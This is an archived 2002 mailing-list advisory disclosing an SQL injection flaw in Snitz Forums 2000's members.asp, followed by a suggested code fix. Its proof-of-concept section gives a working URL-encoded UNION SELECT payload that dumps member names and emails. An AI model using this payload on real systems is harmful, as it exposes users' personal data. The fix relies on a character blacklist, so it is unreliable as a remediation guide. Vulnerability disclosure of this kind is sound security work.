Snitz Forums 2000 remote SQL query manipulation vulnerability

From: acemi (acemi_5@yahoo.com)
Date: Fri Apr 19 2002 - 23:06:46 CEST

Previous message: Steven M. Bellovin: "Re: fragroute vs. snort: the tempest in a teacup"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

('binary' encoding is not supported, stored as-is) vulnerable
----------
Product : Snitz Forums 2000
Version :
3.3
3.3.01
3.3.02
3.3.03 (last stable version)
Object : members.asp
Class : Input validation error (remote SQL query
manipulation vulnerability)
Vendor-URL : http://forum.snitz.com/
Vendor-Status : informed, not patched
Remote-Exploit : yes

Introduction
------------
Snitz Forums 2000 is open source ASP-based web
forum software. It runs on Microsoft Windows
operating systems. A vulnerability exists in Snitz
Forums 2000 which makes it possible for a malicious
user to remotely manipulate the logic of SQL queries.
As a result, it may be possible for attackers to view all
data in the forum's database. This vulnerability can
be exploited with a web browser.

More Details
------------
In members.asp page, when listing the members
with a criteria, the input (M_NAME) is not checked for
malicious code. As a result, an attacker can add
extra SELECT statement to the query with UNION
and he/she can view any data in the forum's
database.

Proof-of-concept
----------------
Normally, to view the members' list whose
membername start with 'A', members.asp page is
used as the following:

/members.asp?
mode=search&M_NAME=A&initial=1&method=

Use this link to view the vulnerability:

/members.asp?mode=search&M_NAME=XXXX%
25')%20UNION%20SELECT%20MEMBER_ID,%
20M_STATUS,%20M_NAME%20%2B%20'/'%20%
2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,%
20M_EMAIL,%20M_COUNTRY,%
20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%
20M_AIM,%20M_TITLE,%20M_POSTS,%
20M_LASTPOSTDATE,%20M_LASTHEREDATE,%
20M_DATE,%20M_STATE%20FROM%
20FORUM_MEMBERS%20WHERE%20(M_NAME%
20LIKE%20'&initial=1&method=

MEMBERNAME column will be
MEMBERNAME/EMAIL/ column.

Temporary fix
-------------
To fix this bug, in members.asp , change the
following lines :

SearchName = Request("M_NAME")
if SearchName = "" then
SearchName = Request.Form("M_NAME")
end if

with :

if IsValidString(Request("M_NAME")) then
SearchName = Request("M_NAME")
end if

if SearchName = "" then
if IsValidString(Request.Form("M_NAME")) then
SearchName = Request.Form("M_NAME")
end if
end if

and in function IsValidString(sValidate) in
inc_functions.asp , change the following line:

sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<"

with :

sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<'"

Previous message: Steven M. Bellovin: "Re: fragroute vs. snort: the tempest in a teacup"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.3 : Fri Apr 19 2002 - 23:31:29 CEST